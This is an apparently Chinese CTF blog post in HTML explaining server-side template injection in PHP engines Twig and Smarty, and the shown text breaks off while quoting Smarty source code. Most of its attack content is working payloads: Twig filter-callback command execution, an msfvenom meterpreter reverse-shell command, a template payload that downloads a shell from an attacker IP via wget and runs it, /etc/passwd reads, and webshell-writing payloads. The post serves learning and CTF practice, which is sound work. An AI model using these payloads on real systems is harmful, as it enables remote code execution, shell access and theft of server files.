

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/Aries.ico">
  <link rel="icon" href="/img/Aries.ico">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="YY">
  <meta name="keywords" content="">
  
    <meta name="description" content="SSTI——模板注入模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸">
<meta property="og:type" content="article">
<meta property="og:title" content="[ctf] ssti模板注入">
<meta property="og:url" content="https://s1n9l3.github.io/2023/01/30/[ctf]%20ssti%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/index.html">
<meta property="og:site_name" content="S1n9l3">
<meta property="og:description" content="SSTI——模板注入模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。 模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200911174631687-758048107.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200910234359019-777787778.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200903164854386-1155449135.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200903185803928-864364882.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/image-20230214221609361.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/image-20230214221644950.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200911002243408-1781833415.png">
<meta property="og:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200909230452926-1382441572.png">
<meta property="article:published_time" content="2023-01-30T13:28:55.785Z">
<meta property="article:modified_time" content="2023-02-15T13:07:17.477Z">
<meta property="article:author" content="YY">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200911174631687-758048107.png">
  
  
  
  <title>[ctf] ssti模板注入 - S1n9l3</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_hj8rtnfg7um.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"s1n9l3.github.io","root":"/","version":"1.9.3","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 6.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>WXYY</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/post.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="[ctf] ssti模板注入"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2023-01-30 21:28" pubdate>
          2023年1月30日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          18k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          153 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">[ctf] ssti模板注入</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="SSTI——模板注入"><a href="#SSTI——模板注入" class="headerlink" title="SSTI——模板注入"></a>SSTI——模板注入</h1><p>模板引擎（这里特指用于Web开发的模板引擎）是为了使用户界面与业务数据（内容）分离而产生的，它可以生成特定格式的文档，利用模板引擎来生成前端的html代码，模板引擎会提供一套生成html代码的程序，然后只需要获取用户的数据，然后放到渲染函数里，然后生成模板+用户数据的前端html页面，然后反馈给浏览器，呈现在用户面前。</p>
<p>模板引擎也会提供沙箱机制来进行漏洞防范，但是可以用沙箱逃逸技术来进行绕过。</p>
<blockquote>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/13508538.html">1. SSTI（模板注入）漏洞（入门篇） - bmjoker - 博客园 (cnblogs.com)</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/bmjoker/p/13653563.html">2. SSTI（模板注入）漏洞（cms实例篇） - bmjoker - 博客园 (cnblogs.com)</a></p>
</blockquote>
<h2 id="SSTI"><a href="#SSTI" class="headerlink" title="SSTI"></a>SSTI</h2><p>SSTI 就是服务器端模板注入（Server-Side Template Injection）</p>
<p>当前使用的一些框架，比如python的flask，php的tp，java的spring等一般都采用成熟的的MVC的模式，用户的输入先进入Controller控制器，然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断，数据库存取，最后把结果返回给View视图层，经过模板渲染展示给用户。</p>
<p>漏洞成因就是服务端接收了用户的恶意输入以后，未经任何处理就将其作为 Web 应用模板内容的一部分，模板引擎在进行目标编译渲染的过程中，执行了用户插入的可以破坏模板的语句，因而可能导致了敏感信息泄露、代码执行、GetShell 等问题。其影响范围主要取决于模版引擎的复杂性。</p>
<p>凡是使用模板的地方都可能会出现 SSTI 的问题，SSTI 不属于任何一种语言，沙盒绕过也不是，沙盒绕过只是由于模板引擎发现了很大的安全漏洞，然后模板引擎设计出来的一种防护机制，不允许使用没有定义或者声明的模块，这适用于所有的模板引擎。</p>
<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200911174631687-758048107.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<h2 id="php中的ssti"><a href="#php中的ssti" class="headerlink" title="php中的ssti"></a>php中的ssti</h2><p>php中常见的模板：</p>
<ul>
<li>twig</li>
<li>smarty</li>
<li>blade</li>
</ul>
<h3 id="Twig"><a href="#Twig" class="headerlink" title="Twig"></a>Twig</h3><p>Twig是一个灵活、高效并且安全的PHP模板引擎。</p>
<p><strong>Twig需要的最低PHP版本为5.2.4。</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>　　<span class="hljs-keyword">require_once</span> <span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-keyword">__FILE__</span>).<span class="hljs-string">&#x27;\twig\lib\Twig\Autoloader.php&#x27;</span>;<br>　　<span class="hljs-title class_">Twig_Autoloader</span>::<span class="hljs-title function_ invoke__">register</span>(<span class="hljs-literal">true</span>);<br>　　<span class="hljs-variable">$twig</span> = <span class="hljs-keyword">new</span> <span class="hljs-title class_">Twig_Environment</span>(<span class="hljs-keyword">new</span> <span class="hljs-title class_">Twig_Loader_String</span>());<br>　　<span class="hljs-variable">$output</span> = <span class="hljs-variable">$twig</span>-&gt;<span class="hljs-title function_ invoke__">render</span>(<span class="hljs-string">&quot;Hello &#123;&#123;name&#125;&#125;&quot;</span>, <span class="hljs-keyword">array</span>(<span class="hljs-string">&quot;name&quot;</span> =&gt; <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;name&quot;</span>]));  <span class="hljs-comment">// 将用户输入作为模版变量的值</span><br>　　<span class="hljs-keyword">echo</span> <span class="hljs-variable">$output</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>Twig使用一个加载器 <code>loader(Twig_Loader_Array)</code> 来定位模板，以及一个环境变量 <code>environment(Twig_Environment)</code> 来存储配置信息。</p>
<p>其中，<code>render()</code> 方法通过其第一个参数载入模板，并通过第二个参数中的变量来渲染模板。</p>
<p>使用 Twig 模版引擎渲染页面，其中模版含有 <code>&#123;&#123;name&#125;&#125;</code> 变量，其模版变量值来自于GET请求参数<code>$_GET[&quot;name&quot;]</code> 。</p>
<p>显然这段代码并没有什么问题，即使你想通过<code>name</code>参数传递一段JavaScript代码给服务端进行渲染，也许你会认为这里可以进行 XSS，但是由于模版引擎一般都默认对渲染的变量值进行编码和转义，所以并不会造成跨站脚本攻击。</p>
<p>但是如果渲染的模版内容受到用户的控制,情况就不一样了：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>　　<span class="hljs-keyword">require_once</span> <span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-keyword">__FILE__</span>).<span class="hljs-string">&#x27;/../lib/Twig/Autoloader.php&#x27;</span>;<br>　　<span class="hljs-title class_">Twig_Autoloader</span>::<span class="hljs-title function_ invoke__">register</span>(<span class="hljs-literal">true</span>);<br>　　<span class="hljs-variable">$twig</span>=<span class="hljs-title function_ invoke__">newTwig_Environment</span>(<span class="hljs-title function_ invoke__">newTwig_Loader_String</span>());<br>　　<span class="hljs-variable">$output</span>=<span class="hljs-variable">$twig</span>-&gt;<span class="hljs-title function_ invoke__">render</span>(<span class="hljs-string">&quot;Hello <span class="hljs-subst">&#123;$_GET[&#x27;name&#x27;]&#125;</span>&quot;</span>);<span class="hljs-comment">// 将用户输入作为模版内容的一部分</span><br>　　<span class="hljs-keyword">echo</span> <span class="hljs-variable">$output</span>;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>上面这段代码在构建模版时，拼接了用户输入作为模板的内容，现在如果再向服务端直接传递 JavaScript 代码，用户输入会原样输出，测试结果显而易见。</p>
<p>如果服务端将用户的输入作为了模板的一部分，那么在页面渲染时也必定会将用户输入的内容进行模版编译和解析最后输出。</p>
<p>在Twig模板引擎里，<code>&#123;&#123;var&#125;&#125;</code> 除了可以输出传递的变量以外，还能执行一些基本的表达式然后将其结果作为该模板变量的值。</p>
<p>例如这里用户输入<code>name=&#123;&#123;2*10&#125;&#125;</code> ，则最后显示的结果为<code>20</code>。</p>
<p>同样，如果插入一些字符和Twig模板注释及表达式，<code>xyz&#123;&#123;2*10&#125;&#125;zyx</code>，最后显示为<code>xyz20zyx</code>。</p>
<p>如何检测SSTI？如果在web页面的源代码中看到了诸如以下的字符，就可以推断网站使用了某些模板引擎来呈现数据：</p>
<figure class="highlight django"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs django"><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">div</span>&gt;</span>&#123;$what&#125;<span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">p</span>&gt;</span>Welcome, </span><span class="hljs-template-variable">&#123;&#123;username&#125;&#125;</span><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">p</span>&gt;</span></span><br><span class="language-xml"><span class="hljs-tag">&lt;<span class="hljs-name">div</span>&gt;</span></span><span class="hljs-template-tag">&#123;%$<span class="hljs-name">a</span>%&#125;</span><span class="language-xml"><span class="hljs-tag">&lt;/<span class="hljs-name">div</span>&gt;</span></span><br></code></pre></td></tr></table></figure>

<p>然后尝试使用表达式，比如<code>&#123;&#123;2+28&#125;&#125;</code>，查看响应。</p>
<p>针对twid的攻击荷载：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.registerUndefinedFilterCallback</span>(<span class="hljs-name">&quot;exec&quot;</span>)&#125;&#125;</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.getFilter</span>(<span class="hljs-name">&quot;id&quot;</span>)&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<p>使用msf生成php的有效荷载：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">msfvenom -p php<span class="hljs-regexp">/meterpreter/</span>reverse_tcp -f raw LHOST=<span class="hljs-number">192.168</span>.<span class="hljs-number">127.131</span> LPORT=<span class="hljs-number">4321</span> &gt; <span class="hljs-regexp">/var/</span>www<span class="hljs-regexp">/html/</span>shell.txt<br></code></pre></td></tr></table></figure>

<p>msf进行监听；在目标上远程下载shell，并重命名运行：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.registerUndefinedFilterCallback</span>(<span class="hljs-name">&quot;exec&quot;</span>)&#125;&#125;</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.getFilter</span>(<span class="hljs-name">&quot;wget http://192.168.127.131/shell.txt -O /tmp/shell.php;php -f /tmp/shell.php&quot;</span>)&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<hr>
<p>如果使用的是twig3.x版本，新增了<code>filter</code>和<code>map</code>等语法，可以尝试这些payload：</p>
<figure class="highlight handlebars"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs handlebars"><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">&#x27;/etc/passwd&#x27;</span>|file_excerpt(<span class="hljs-name">1</span>,<span class="hljs-number">30</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">app.request.files.get</span>(<span class="hljs-name">1</span>).__construct(<span class="hljs-name">&#x27;/etc/passwd&#x27;</span>,<span class="hljs-string">&#x27;&#x27;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">app.request.files.get</span>(<span class="hljs-name">1</span>).openFile.fread(<span class="hljs-name">99</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.registerUndefinedFilterCallback</span>(<span class="hljs-name">&quot;exec&quot;</span>)&#125;&#125;</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.getFilter</span>(<span class="hljs-name">&quot;whoami&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.enableDebug</span>()&#125;&#125;</span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">_self.env.isDebug</span>()&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;]</span>|map(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)</span><br><span class="hljs-template-variable"></span><br><span class="hljs-template-variable">&#123;&#123;&#123;<span class="hljs-string">&quot;&lt;?php phpinfo();&quot;</span>:<span class="hljs-string">&quot;/var/www/html/shell.php&quot;</span>&#125;|map(<span class="hljs-name">&quot;file_put_contents&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;,0]</span>|sort(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&quot;id&quot;]</span>|filter(<span class="hljs-name">&quot;system&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[0,0]</span>|reduce(<span class="hljs-name">&quot;system&quot;</span>,<span class="hljs-string">&quot;id&quot;</span>)|join(<span class="hljs-name">&quot;,&quot;</span>)&#125;&#125;</span><span class="language-xml"></span><br><span class="language-xml"></span><br><span class="language-xml"></span><span class="hljs-template-variable">&#123;&#123;<span class="hljs-name">[&#x27;cat /etc/passwd&#x27;]</span>|filter(<span class="hljs-name">&#x27;system&#x27;</span>)&#125;&#125;</span><br></code></pre></td></tr></table></figure>

<blockquote>
<p><a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/7518">TWIG 全版本通用 SSTI payloads - 先知社区 (aliyun.com)</a></p>
</blockquote>
<h3 id="Smarty"><a href="#Smarty" class="headerlink" title="Smarty"></a>Smarty</h3><p>Smarty是最流行的PHP模板语言之一，为不受信任的模板执行提供了安全模式。这会强制执行在 php 安全函数白名单中的函数，因此我们在模板中无法直接调用 php 中直接执行命令的函数(相当于存在了一个<code>disable_function</code>)。</p>
<p>但是，实际上对语言的限制并不能影响我们执行命令，<code>$smarty</code>内置变量可用于访问各种环境变量，比如我们使用 self 得到 smarty 这个类以后我们就去找 smarty 给我们的的方法：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">smarty<span class="hljs-regexp">/libs/</span>sysplugins/smarty_internal_data.php　　——&gt;　　getStreamVariable() 这个方法可以获取传入变量的流<br></code></pre></td></tr></table></figure>

<p><img src="https://picgo-1307028727.cos.ap-chengdu.myqcloud.com/picgo/1344396-20200910234359019-777787778.png" srcset="/img/loading.gif" lazyload alt="img"></p>
<p>因此我们可以用这个方法读文件，payload：</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs css">&#123;self::<span class="hljs-built_in">getStreamVariable</span>(<span class="hljs-string">&quot;file:///etc/passwd&quot;</span>)&#125;<br></code></pre></td></tr></table></figure>

<p>同样在</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">smarty<span class="hljs-regexp">/libs/</span>sysplugins/smarty_internal_write_file.php　　——&gt;　　Smarty_Internal_Write_File 这个类中有一个writeFile方法<br></code></pre></td></tr></table></figure>

<p>其源码为：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">Smarty_Internal_Write_File</span></span><br><span class="hljs-class"></span>&#123;<br>    <span class="hljs-comment">/**</span><br><span class="hljs-comment">     * Writes file in a safe way to disk</span><br><span class="hljs-comment">     *</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@param</span>  string $_filepath complete filepath</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@param</span>  string $_contents file content</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@param</span>  Smarty $smarty    smarty instance</span><br><span class="hljs-comment">     *</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@throws</span> SmartyException</span><br><span class="hljs-comment">     * <span class="hljs-doctag">@return</span> boolean true</span><br><span class="hljs-comment">     */</span><br>    <span class="hljs-keyword">public</span> <span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">writeFile</span>(<span class="hljs-params"><span class="hljs-variable">$_filepath</span>, <span class="hljs-variable">$_contents</span>, Smarty <span class="hljs-variable">$smarty</span></span>)</span><br><span class="hljs-function">    </span>&#123;<br>        <span class="hljs-variable">$_error_reporting</span> = <span class="hljs-title function_ invoke__">error_reporting</span>();<br>        <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-variable">$_error_reporting</span> &amp; ~E_NOTICE &amp; ~E_WARNING);<br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$smarty</span>-&gt;_file_perms !== <span class="hljs-literal">null</span>) &#123;<br>            <span class="hljs-variable">$old_umask</span> = <span class="hljs-title function_ invoke__">umask</span>(<span class="hljs-number">0</span>);<br>        &#125;<br><br>        <span class="hljs-variable">$_dirpath</span> = <span class="hljs-title function_ invoke__">dirname</span>(<span class="hljs-variable">$_filepath</span>);<br>        <span class="hljs-comment">// if subdirs, create dir structure</span><br>        <span class="hljs-keyword">if</span> (<span class="hljs-variable">$_dirpath</span> !== <span class="hljs-string">&#x27;.&#x27;</span> &amp;&amp; !<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-variable">$_dirpath</span>)) &#123;<br>            <span class="hljs-title function_ invoke__">mkdir</span>(<span class="hljs-variable">$_dirpath</span>, <span class="hljs-variable">$smarty</span>-&gt;_dir_perms === <span class="hljs-literal">null</span> ? <span class="hljs-number">0777</span> : <span class="hljs-variable">$smarty</span>-&gt;_dir_perms, <span class="hljs-literal">true</span>);<br>        &#125;<br><br>        <span class="hljs-comment">// write to tmp file, then move to overt file lock race condition</span><br>        <span class="hljs-variable">$_tmp_file</span> = <span class="hljs-variable">$_dirpath</span> . DS . <span class="hljs-title function_ invoke__">str_replace</span>(<span class="hljs-keyword">array</span>(<span class="hljs-string">&#x27;.&#x27;</span>, <span class="hljs-string">&#x27;,&#x27;</span>), <span class="hljs-string">&#x27;_&#x27;</span>, <span class="hljs-title function_ invoke__">uniqid</span>(<span class="hljs-string">&#x27;wrt&#x27;</span>, <span class="hljs-literal">true</span>));<br>        <span class="hljs-keyword">if</span> (!<span class="hljs-title function_ invoke__">file_put_contents</span>(<span class="hljs-variable">$_tmp_file</span>, <span class="hljs-variable">$_contents</span>)) &#123;<br>            <span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-variable">$_error_reporting</span>);<br>            <span class="hljs-keyword">throw</span> <span class="hljs-keyword">new</span> <span class="hljs-title class_">SmartyException</span>(<span class="hljs-string">&quot;unable to write file <span class="hljs-subst">&#123;$_tmp_file&#125;</span>&quot;</span>);<br>       &#125;<br><br>        <span class="hljs-comment">/*</span><br><span class="hljs-comment">         * Windows&#x27; rename() fails if the destination exists,</span><br><span class="hljs-comment">         * Linux&#x27; rename() properly handles the overwrite.</span><br><span class="hljs-comment">         * Simply unlink()ing a file might cause other processes</span><br><span class="hljs-comment">         * currently reading that file to fail, but linux&#x27; rename()</span><br><span class="hljs-comment">         * seems to be smart enough to handle that for us.</span><br><span class="hljs-comment">         */</span><br>        <span class="hljs-keyword">if</span> (<span class="hljs-title class_">Smarty</span>::<span class="hljs-variable">$_IS_WINDOWS</span>) &#123;<br>            <span class="hljs-comment">// remove original file</span><br>            <span 